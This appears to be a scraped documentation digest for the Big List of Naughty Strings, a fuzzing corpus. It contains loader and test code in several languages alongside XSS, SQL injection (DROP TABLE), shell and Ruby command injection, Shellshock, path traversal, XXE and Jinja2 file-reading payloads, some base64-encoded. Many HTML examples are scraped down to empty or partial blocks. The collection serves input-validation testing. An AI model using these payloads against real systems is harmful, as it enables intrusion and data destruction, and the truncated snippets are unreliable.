### XSS Attempt with Script Tag and Unquoted Attributes
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This example injects a script by using unquoted attributes in an img tag, followed by a script tag to execute JavaScript.
```html
">
```
--------------------------------
### Load Naughty Strings from Local File in Python
Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt
Use the naughtystrings Python library to load strings from the local blns.txt file. Demonstrates default loading and loading from a custom filepath. Includes an example of testing a Django form field.
```python
import sys
sys.path.insert(0, 'naughtystrings')
from naughtystrings import naughty_strings
# Default: reads from the bundled blns.txt
strings = naughty_strings()
print(f"Loaded {len(strings)} strings")
# Loaded 507 strings
# First entry is always an empty string
assert strings[0] == ""
# Custom file path
strings_custom = naughty_strings(filepath='/path/to/my/blns.txt')
# Example: test a Django form field
from django.test import TestCase
from myapp.forms import ProfileForm
class NaughtyStringFormTest(TestCase):
def test_username_field(self):
for s in naughty_strings():
form = ProfileForm(data={'username': s})
# Should never raise an uncaught exception
try:
form.is_valid()
except Exception as e:
self.fail(f"Form raised {type(e).__name__} for input: {repr(s)}")
```
--------------------------------
### Filter Category Headers in blns.txt
Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt
Use grep to filter and display all category headers from the blns.txt file. Lines starting with '#' are considered comments and headers.
```bash
# View all category headers
grep '^#' blns.txt
```
--------------------------------
### XSS Attempt with onmouseover Event
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
These examples trigger JavaScript alerts using the 'onmouseover' event handler in img tags, with and without a src attribute.
```html
```
```html
```
```html
```
--------------------------------
### Get Base64 Encoded Naughty Strings in Go
Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt
Returns a Go slice of strings where each element is the base64-encoded version of a naughty string. Useful for testing decoders and systems that accept base64 input.
```go
package mypackage_test
import (
"encoding/base64"
"testing"
"github.com/minimaxir/big-list-of-naughty-strings/naughtystrings"
)
func TestBase64DecoderRobustness(t *testing.T) {
for _, enc := range naughtystrings.Base64Encoded() {
raw, err := base64.StdEncoding.DecodeString(enc)
if err != nil {
t.Fatalf("Unexpected base64 decode error: %v", err)
}
// Feed decoded bytes into your system
if err := ProcessRawBytes(raw); err != nil {
t.Logf("Handled error for input %q: %v", string(raw), err)
}
}
}
```
--------------------------------
### XSS Attempt with Conditional Comment and Image onerror
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This example uses an IE conditional comment to embed an img tag with an onerror handler, aiming to execute JavaScript.
```html
```
--------------------------------
### XSS Attempt with Whitespace in JavaScript URL
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
These examples attempt to execute JavaScript by including whitespace characters within the 'javascript:' URL in the img tag's src attribute.
```html
```
```html
```
```html
```
```html
```
--------------------------------
### XSS Attempt with Nested Script Tag in Image Source
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This example attempts to inject a script tag by nesting it within the 'src' attribute of an img tag, potentially bypassing filters.
```html
" `>
```
--------------------------------
### Get Unencoded Naughty Strings in Go
Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt
Returns a Go slice of strings containing all entries from blns.json. This function is safe for concurrent use as the data is loaded at package init time.
```go
package mypackage_test
import (
"testing"
"github.com/minimaxir/big-list-of-naughty-strings/naughtystrings"
)
func TestHandleInputWithNaughtyStrings(t *testing.T) {
for _, s := range naughtystrings.Unencoded() {
result, err := HandleUserInput(s)
if err != nil {
// Validation errors are acceptable; panics/crashes are not
continue
}
if result == nil {
t.Errorf("HandleUserInput returned nil for input: %q", s)
}
}
}
```
--------------------------------
### XSS Attempt with Nested Image Tag in Anchor
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This example attempts to inject an img tag with an onerror handler within the href attribute of an anchor tag, using backticks for obfuscation.
```html
![`]()
">
```
--------------------------------
### XSS Attempt with Hex Encoded Whitespace in onerror
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
These examples inject JavaScript by using hex-encoded whitespace characters before the onerror handler's value in an img tag.
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
--------------------------------
### XSS Attempt with Hex Encoded Characters in Image Source
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
These examples use hexadecimal-encoded characters within the 'src' attribute of an img tag to obfuscate the payload and trigger JavaScript execution.
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
```html
```
--------------------------------
### Regenerate blns.base64.txt from blns.txt using Bash
Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt
A Bash script to regenerate blns.base64.txt by base64 encoding non-comment, non-empty lines from blns.txt. This script preserves comments and blank lines.
```bash
# From the repository root
bash scripts/texttobase64.sh > blns.base64.txt
# Inspect a few encoded entries
head -30 blns.base64.txt
# Example output (comments preserved, strings encoded):
# Reserved Strings
#
# Strings which may be used elsewhere in code
#
dW5kZWZpbmVk <- "undefined"
bW5kZWY= <- "undef"
bbnVsbA== <- "null"
```
--------------------------------
### Command Injection (Ruby)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Strings designed to execute system commands within Ruby/Rails applications.
```ruby
eval("puts 'hello world'")
```
```ruby
System("ls -al /")
```
```ruby
`ls -al /`
```
```ruby
Kernel.exec("ls -al /")
```
```ruby
Kernel.exit(1)
```
```ruby
%x('ls -al /')
```
--------------------------------
### Basic XSS Script Injection
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Demonstrates direct injection of a script tag to execute JavaScript. This is a fundamental XSS payload.
```html
```
--------------------------------
### Iterate Naughty Strings in Node.js
Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt
Load the blns.json file in Node.js and iterate through each string, processing it with a hypothetical myInputProcessor function. Logs success or failure with error messages.
```javascript
// Node.js: load and iterate all naughty strings
const blns = require('./blns.json');
for (const str of blns) {
try {
const result = myInputProcessor(str);
console.log(`OK: ${JSON.stringify(str).slice(0, 60)}`);
} catch (err) {
console.error(`FAIL [${err.message}]: ${JSON.stringify(str).slice(0, 60)}`);
}
}
```
--------------------------------
### XSS Attempt with oncopy Event
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to execute JavaScript using the 'oncopy' event handler.
```html
Copy me
```
--------------------------------
### XSS Attempt with Commented Out Code
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to execute JavaScript by using commented-out code followed by an alert.
```html
\";alert('223');//
```
--------------------------------
### Regenerate blns.json from blns.txt using Python
Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt
This script regenerates the blns.json file from blns.txt. Run it after modifying blns.txt to ensure the JSON file is up-to-date. It handles comments, blank lines, and Unicode characters.
```bash
# From the repository root
cd scripts
python txt_to_json.py
# Writes updated ../blns.json
# Verify the output
python -c "import json; d=json.load(open('../blns.json')); print(len(d), 'strings'); print('First:', repr(d[0])); print('Sample:', repr(d[5]))"
# 507 strings
# First: ''
# Sample: 'null'
```
--------------------------------
### XXE Injection (XML)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This XML string can reveal system files when parsed by a misconfigured XML parser.
```xml
]>&xxe;
```
--------------------------------
### XSS Attempt with onwheel Event
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to execute JavaScript using the 'onwheel' event handler.
```html
Scroll over me
```
--------------------------------
### Known CVEs and Vulnerabilities
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Strings that test for known vulnerabilities, such as the Shellshock vulnerability.
```shell
() { 0; }; touch /tmp/blns.shellshock1.fail;
```
```shell
() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
```
```plaintext
<<< %s(un='%s') = %u
```
```plaintext
+++ATH0
```
--------------------------------
### Load and Validate Naughty Strings in Python
Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt
Load the blns.json file in Python using the json module. Iterates through the strings and validates them using a hypothetical validate_input function, asserting that the result is never None.
```python
import json
with open('blns.json', 'r', encoding='utf-8') as f:
naughty_strings = json.load(f)
print(f"Total strings: {len(naughty_strings)}")
# Total strings: 507 (approximate; list grows over time)
for s in naughty_strings:
result = validate_input(s)
assert result is not None, f"Unexpected None for input: {repr(s)}"
```
--------------------------------
### Server Code Injection Strings
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
These strings can lead to arbitrary code execution on the server, potentially as a privileged user.
```shell
/dev/null; touch /tmp/blns.fail ; echo
```
```shell
`touch /tmp/blns.fail`
```
```shell
$(touch /tmp/blns.fail)
```
```ruby
@{[system "touch /tmp/blns.fail"]}
```
--------------------------------
### JavaScript Event Handler with Pseudo-Protocol (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
This Base64 encoded string uses a 'javascript:' pseudo-protocol within an event handler like 'onkeyup'. It tests if the system correctly identifies and blocks such attempts to execute JavaScript directly.
```javascript
IiBhdXRvZm9jdXMgb25rZXl1cD0iamF2YXNjcmlwdDphbGVydCgxMjMp
```
```javascript
JyBhdXRvZm9jdXMgb25rZXl1cD0namF2YXNjcmlwdDphbGVydCgxMjMp
```
--------------------------------
### Count Total Strings in blns.txt
Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt
Count the total number of non-comment and non-blank lines in the blns.txt file. This provides a quick way to verify the number of test strings.
```bash
# Count total strings (excluding comments and blank lines)
grep -v '^#' blns.txt | grep -v '^$' | wc -l
```
--------------------------------
### XSS Attempt with Unclosed Image Tag
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to execute JavaScript by using an unclosed img tag with a javascript: URL.
```html
```
--------------------------------
### XSS via String Termination and Injection
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Tests XSS by terminating a string literal with a quote and semicolon, followed by script execution. This payload includes variations for different string termination characters.
```html
";alert(15);t="
```
```html
';alert(16);t='
```
--------------------------------
### XSS Attempt with Title PropertyChange and Empty Title
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string exploits the 'onpropertychange' event of a title tag, combined with an empty title attribute, to execute JavaScript.
```html
```
--------------------------------
### XSS via Comment and Script Injection
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Injects a script tag immediately after an HTML comment delimiter (`-->`), which can be used to execute scripts in contexts where comments are allowed.
```html
-->
```
--------------------------------
### File Inclusion Strings
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
These strings can cause a web server to include unintended files, potentially leading to information disclosure.
```plaintext
../../../../../../../../../../../../etc/passwd%00
```
```plaintext
../../../../../../../../../../../../etc/hosts
```
--------------------------------
### XSS via JavaScript URI in String Context
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Injects a `javascript:` URI within a string context, often seen in attribute values or variable assignments, to trigger script execution.
```html
JavaSCript:alert(17)
```
```html
;alert(18);
```
```html
src=JaVaSCript:prompt(19)
```
--------------------------------
### XSS Attempt with Bracket Notation and Obfuscated Alert
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string uses bracket notation for attribute access and obfuscates the alert call within an img tag's onerror handler.
```html
```
--------------------------------
### XSS Attempt with Script Tag and Unicode
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to inject a JavaScript alert using a script tag with a non-breaking space character.
```html
"`'>
```
--------------------------------
### XSS Attempt with Shortened Script URL
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to inject a script by using a shortened URL in the script tag's src attribute.
```html
ript>
```
--------------------------------
### XSS via JavaScript Event Handler with Quotes
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Tests XSS by triggering JavaScript execution through event handlers like `onkeyup` using `javascript:` URIs. Includes variations with different quote types and the `autofocus` attribute.
```html
" autofocus onkeyup="javascript:alert(23)
```
```html
' autofocus onkeyup='javascript:alert(24)
```
--------------------------------
### Extract SQL Injection Strings using Python
Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt
This Python script extracts only the SQL injection strings from blns.txt. It reads the file line by line, identifies the SQL Injection section, and collects relevant strings.
```python
# Extract only SQL injection strings for targeted testing
import re
sql_strings = []
in_section = False
with open('blns.txt', 'r', encoding='utf-8') as f:
for line in f:
line = line.rstrip('\n')
if re.match(r'#\s*SQL Injection', line):
in_section = True
continue
if in_section and line.startswith('#') and 'SQL' not in line:
break
if in_section and line and not line.startswith('#'):
sql_strings.append(line)
print(sql_strings)
# ["1;DROP TABLE users", "1'; DROP TABLE users-- 1", "' OR 1=1 -- 1", ...]
```
--------------------------------
### Perl Script for XSS Injection
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This Perl one-liner generates an img tag with a null-byte-separated JavaScript URL, intended for XSS testing.
```perl
perl -e 'print "
";' > out
```
--------------------------------
### XSS Attempt with Nested Script Tags
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to execute JavaScript by nesting script tags, potentially bypassing filters.
```html
<
```
--------------------------------
### XSS Attempt with Script Tag and Path Traversal
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to inject a script by using a path-like structure in the script tag's src attribute, potentially bypassing filters.
```html
```
```html
```
--------------------------------
### XSS Attempt with Plaintext and Script Tag
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to execute JavaScript by embedding a script tag within a plaintext element, followed by a textarea.
```html
http://a/%%30%30
```
--------------------------------
### XSS via Script Tag Closure and Reopening
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Attempts to bypass filters by closing an existing script tag and immediately opening a new one to inject malicious code.
```html
```
--------------------------------
### XSS Attempt with Malformed Image Tag and Comment
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string uses a malformed img tag with an onerror attribute and a comment to execute JavaScript.
```html
```
--------------------------------
### XSS Attempt with Conditional Comment and Script
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string uses an IE conditional comment to hide a script tag, which then attempts to execute JavaScript.
```html
```
--------------------------------
### SQL Injection Strings
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
These strings can be used to exploit SQL injection vulnerabilities if user inputs are not properly sanitized.
```sql
1;DROP TABLE users
```
```sql
1'; DROP TABLE users--
```
```sql
' OR 1=1 -- 1
```
```sql
' OR '1'='1
```
```sql
'; EXEC sp_MSForEachTable 'DROP TABLE ?'; --
```
--------------------------------
### Obfuscated Script Execution within Script Tag (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
This Base64 encoded string attempts to execute JavaScript within a script tag, using obfuscated characters like \x3C and \x3E. It tests for vulnerabilities in script tag parsing and execution.
```html
J2AiPjxceDNDc2NyaXB0PmphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=
```
```html
J2AiPjxceDAwc2NyaXB0PmphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4=
```
--------------------------------
### XSS Attempt with Decimal Character Code Encoded JavaScript URL
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string executes JavaScript by encoding 'javascript:alert()' using decimal character codes within the img tag's src attribute.
```html
```
```html
```
--------------------------------
### Script Injection with Malformed Attributes (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
These Base64 encoded strings attempt script injection by using malformed or unusual attribute values, often involving quotes and semicolons. They test the robustness of attribute parsing and sanitization.
```html
IjthbGVydCgxMjMpO3Q9Ig==
```
```html
JzthbGVydCgxMjMpO3Q9Jw==
```
```html
SmF2YVNDcmlwdDphbGVydCgxMjMp
```
```html
O2FsZXJ0KDEyMyk7
```
```html
c3JjPUphVmFTQ3JpcHQ6cHJvbXB0KDEzMik=
```
```html
Ij48c2NyaXB0PmFsZXJ0KDEyMyk7PC9zY3JpcHQgeD0i
```
```html
Jz48c2NyaXB0PmFsZXJ0KDEyMyk7PC9zY3JpcHQgeD0n
```
```html
PjxzY3JpcHQ+YWxlcnQoMTIzKTs8L3NjcmlwdCB4PQ==
```
--------------------------------
### XSS via Script Injection with Extra Attributes
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Injects script tags while including additional attributes, testing how parsers handle malformed or extended tag structures.
```html
">
```
```html
```
--------------------------------
### Jinja2 Injection
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Strings designed to exploit Jinja2 templating engine, one causing a MemoryError and the other reading sensitive files.
```jinja2
{% print 'x' * 64 * 1024**3 %}
```
```jinja2
{{ "".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
```
--------------------------------
### HTML Script Tag Injection with HTML Entities (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
This string, encoded in Base64, represents an attempt to inject a script tag using HTML entities for angle brackets. It tests for vulnerabilities where HTML entities might be misinterpreted.
```html
Jmx0O3NjcmlwdCZndDthbGVydCgmIzM5OzEyMyYjMzk7KTsmbHQ7L3NjcmlwdCZndDs=
```
--------------------------------
### HTML Script Tag Injection (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
This string is a Base64 encoded version of a script tag that attempts to execute an alert. It's used to test if a system properly decodes and sanitizes user input before rendering HTML.
```html
PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+
```
--------------------------------
### Anchor Tag with JavaScript Pseudo-Protocol (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
These Base64 encoded strings use anchor tags with 'javascript:' pseudo-protocol in the href attribute. This tests for vulnerabilities where links might execute JavaScript when clicked or interacted with.
```html
PGEgaHJlZj0iXHgwQmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt
ZW50MSI+dGVzdDwvYT4=
```
```html
PGEgaHJlZj0iXHgwRmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt
ZW50MSI+dGVzdDwvYT4=
```
```html
PGEgaHJlZj0iXHhDMlx4QTBqYXZhc2NyaXB0OmphdmFzY3JpcHQ6YWxlcnQoMSkiIGlkPSJmdXp6
ZWxlbWVudDEiPnRlc3Q8L2E+
```
```html
PGEgaHJlZj0iXHgwNWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt
ZW50MSI+dGVzdDwvYT4=
```
```html
PGEgaHJlZj0iXHhFMVx4QTBceDhFamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEpIiBpZD0i
ZnV6emVsZW1lbnQxIj50ZXN0PC9hPg==
```
```html
PGEgaHJlZj0iXHgxOGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt
ZW50MSI+dGVzdDwvYT4=
```
```html
PGEgaHJlZj0iXHgxMWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt
ZW50MSI+dGVzdDwvYT4=
```
```html
PGEgaHJlZj0iXHhFMlx4ODBceDg4amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEpIiBpZD0i
```
--------------------------------
### Closing Tag Script Injection (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
This Base64 encoded string attempts to inject a script by first closing an existing tag and then opening a script tag. It tests for vulnerabilities in tag parsing and attribute handling.
```html
Ij48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD4=
```
```html
Jz48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD4=
```
```html
PjxzY3JpcHQ+YWxlcnQoMTIzKTwvc2NyaXB0Pg==
```
--------------------------------
### Obfuscated Script Tag Injection (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
This Base64 encoded string contains an obfuscated attempt to inject a script. It tests for vulnerabilities where simple pattern matching might fail due to the obfuscation techniques used.
```html
PCAvIHNjcmlwdCA+PCBzY3JpcHQgPmFsZXJ0KDEyMyk8IC8gc2NyaXB0ID4=
```
--------------------------------
### XSS via onfocus Event with JavaScript URI
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Exploits the `onfocus` event handler using a `javascript:` URI. The `autofocus` attribute ensures the element receives focus automatically. Case variations in `javascript` are tested.
```html
onfocus=JaVaSCript:alert(9) autofocus
```
```html
" onfocus=JaVaSCript:alert(10) autofocus
```
```html
' onfocus=JaVaSCript:alert(11) autofocus
```
--------------------------------
### XSS via Malformed Script Tags
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
These strings test for XSS vulnerabilities by injecting JavaScript into `
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
```html
"`'>
```
--------------------------------
### JavaScript Event Handler Obfuscation (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
This Base64 encoded string attempts to trigger JavaScript execution via an event handler like 'onfocus', using a 'javascript:' pseudo-protocol. It tests for vulnerabilities in event handler sanitization.
```javascript
b25mb2N1cz1KYVZhU0NyaXB0OmFsZXJ0KDEyMykgYXV0b2ZvY3Vz
```
```javascript
IiBvbmZvY3VzPUphVmFTQ3JpcHQ6YWxlcnQoMTIzKSBhdXRvZm9jdXM=
```
```javascript
JyBvbmZvY3VzPUphVmFTQ3JpcHQ6YWxlcnQoMTIzKSBhdXRvZm9jdXM=
```
--------------------------------
### XSS via JavaScript URI in href with Obfuscation
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Tests XSS by using `javascript:` URIs in `href` attributes of anchor tags. This payload uses various non-standard whitespace characters and control characters to obfuscate the URI, potentially bypassing filters.
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
```html
test
```
--------------------------------
### Commented Script Injection (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
This Base64 encoded string injects a script tag after an HTML comment. It tests if the comment is properly closed and if the subsequent script is executed.
```html
LS0+PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+
```
--------------------------------
### XSS Attempt with Character Code Encoded JavaScript URL
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string executes JavaScript by encoding the 'javascript:alert()' call using character codes within the img tag's src attribute.
```html
```
--------------------------------
### Unicode Obfuscation in Script Tag (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
This Base64 encoded string uses Unicode characters within a script tag to attempt obfuscation. It tests if the system correctly handles or rejects such Unicode-based script injection attempts.
```html
77ycc2NyaXB077yeYWxlcnQoMTIzKe+8nC9zY3JpcHTvvJ4=
```
--------------------------------
### XSS Attempt with HTML Entity Encoded JavaScript URL
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to execute JavaScript by encoding the 'javascript:' scheme using HTML entities within an anchor tag's href attribute.
```html
XXX
```
--------------------------------
### XSS via Malformed Image Tags
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
These strings test for XSS vulnerabilities by injecting JavaScript into the `onerror` attribute of an `img` tag, using various control characters and quotes. Ensure proper attribute escaping and sanitization.
```html
"'>
```
```html
"'>
```
```html
"'>
```
```html
"'>
```
```html
"'>
```
```html
"'>
```
```html
"'>
```
```html
"'>
```
```html
"'>
```
```html
"'>
```
--------------------------------
### XSS Attempt with Null Byte in Image Source
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string uses a null byte within the 'src' attribute of an img tag to bypass filters and execute JavaScript.
```html
```
--------------------------------
### XSS Attempt with Invalid Characters in Body Tag
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
This string attempts to execute JavaScript by using invalid characters within the 'onload' attribute of a body tag.
```html
```
--------------------------------
### XSS via Image onerror Event
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Exploits the `onerror` event handler of an `
` tag. If the image source is invalid, the JavaScript in `onerror` will execute.
```html
```
--------------------------------
### XSS via Escaped Angle Brackets and Null Bytes
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Tests XSS by using escaped angle brackets (`\x3C`, `\x00`) and null bytes within script tag definitions. This bypasses filters by altering the literal representation of the tag.
```html
'`"><\x3Cscript>javascript:alert(32)
```
```html
'`"><\x00script>javascript:alert(33)
```
--------------------------------
### XSS with Whitespace in Script Tags
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt
Tests the robustness of input sanitization against script tags that contain extraneous whitespace characters, which might bypass simple pattern matching.
```html
< / script >< script >alert(8)< / script >
```
--------------------------------
### Image Tag with onerror Event (Base64 Encoded)
Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt
This Base64 encoded string attempts to trigger an XSS vulnerability through an image tag's onerror event. It tests if the onerror attribute is properly sanitized.
```html
PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEyMykgLz4=
```